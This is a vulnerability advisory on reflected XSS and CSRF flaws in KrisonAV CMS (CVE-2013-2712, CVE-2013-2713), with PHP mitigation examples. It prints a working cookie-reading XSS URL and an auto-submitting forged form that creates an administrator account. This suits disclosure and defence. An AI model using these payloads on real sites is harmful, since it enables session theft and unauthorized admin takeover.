High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in KrisonAV CMS, which can be exploited to perform cross-site scripting and cross-site request forgery attacks.
Cross-Site Scripting (XSS) vulnerability in KrisonAV CMS: CVE-2013-2712
The vulnerability exists due to insufficient filtration of user-supplied data passed to the "content" HTTP GET parameter of the "/services/get_article.php" script. A remote attacker can trick a user into following a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
The exploitation example below uses the JavaScript "alert()" function to display the user's cookies:
http://[host]/services/get_article.php?content=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
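The flaw is a reflected parameter written into the page without encoding. The snippet below is an added illustration, not KrisonAV code (the advisory does not show the CMS source): it contrasts the vulnerable pattern of echoing the raw "content" value with the hardened pattern of HTML-encoding it for the context it lands in. The function names and the surrounding markup are assumptions.

```php
<?php
// Added illustration (not KrisonAV code) of how a reflected GET parameter
// such as "content" in get_article.php should be emitted.

// The parameter exactly as the request supplies it.
$content = isset($_GET['content']) ? $_GET['content'] : '';

// Vulnerable pattern: the raw value becomes live markup, so a <script>
// element in the parameter executes in the victim's browser.
function render_unsafe(string $content): string {
    return '<div class="article">' . $content . '</div>';
}

// Hardened pattern: encode for an HTML text context.
//  - ENT_QUOTES encodes both " and ' so the value is also safe inside
//    attribute values delimited by either quote style.
//  - ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of returning
//    an empty string, which would otherwise silently drop the article.
function render_safe(string $content): string {
    $encoded = htmlspecialchars(
        $content,
        ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
        'UTF-8'
    );
    return '<div class="article">' . $encoded . '</div>';
}

// Declaring the charset removes a second class of encoding tricks that
// rely on the browser guessing a different character set.
header('Content-Type: text/html; charset=UTF-8');
// Defence in depth: a restrictive CSP blocks inline script even if an
// encoding step is missed elsewhere in the application.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");

echo render_safe($content);
```

Encoding at the point of output is the fix; filtering "dangerous" characters on input is what the advisory calls insufficient filtration, because the set of characters that is dangerous depends on where the value is written (HTML body, attribute, JavaScript string, URL), and a single input filter cannot be right for all of them.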
Cross-Site Request Forgery (CSRF) vulnerability in KrisonAV CMS: CVE-2013-2713
The vulnerability exists due to insufficient verification of the HTTP request origin in the "/users_maint.html" script. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and create a new account with administrative privileges.
The PoC (Proof-of-Concept) below will create a new account with login "username" and password "password":
<form action="http://[host]/users_maint.html?itemid=52&maint=1&ccsForm=users" method="post" name="f1">
<input type="hidden" name="disabledCheckBox" value="1">
<input type="hidden" name="username" value="username">
<input type="hidden" name="password" value="password">
<input type="hidden" name="groups_index" value="20">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="Button_Insert" value="Save">
<input type="submit" id="btn">
</form>
<script>
document.f1.submit();
</script>
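The forged form works because the server accepts any POST that carries the administrator's session cookie, without checking that the request was issued by its own page. The code below is an added illustration of the standard mitigation, not KrisonAV code: a per-session synchronizer token embedded in every state-changing form and verified with a constant-time comparison, backed by an Origin/Referer check. The field name "csrf_token", the session key, and the SITE_HOST constant are assumptions.

```php
<?php
// Added illustration (not KrisonAV code): CSRF protection for a
// state-changing form such as the user-maintenance form in users_maint.html.
// "csrf_token" (field and session key) and SITE_HOST are assumed names.

session_start();
define('SITE_HOST', 'cms.example');   // assumed hostname of this deployment

// One token per session, 32 random bytes, hex-encoded (64 characters).
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to include in every form that changes state. An attacker's
// page cannot read this value, so a cross-site form cannot reproduce it.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Returns true only when the submitted token matches the session token
// (compared in constant time) and, when a browser sent an Origin or Referer
// header, that header names this site. Either check alone defeats the forged
// form above; both are kept because some proxies strip one of the headers.
function csrf_request_is_valid(array $post, array $server, string $site_host): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source !== '') {
        $host = parse_url($source, PHP_URL_HOST);
        if (!is_string($host) || strcasecmp($host, $site_host) !== 0) {
            return false;
        }
    }
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_request_is_valid($_POST, $_SERVER, SITE_HOST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // Only past this point should the account insert be performed.
}

// When rendering the form, emit csrf_field() inside the <form> element so
// the legitimate page submits a token the attacker's page cannot supply.
```

Two details matter in practice: the token must be bound to the session (a token that is merely unguessable but not tied to the user can be obtained by the attacker from their own session and replayed), and the comparison must use hash_equals rather than == so that the check does not leak the token byte by byte through timing. Marking the session cookie SameSite=Lax is a useful additional layer, but on its own it does not protect deployments reached from older browsers.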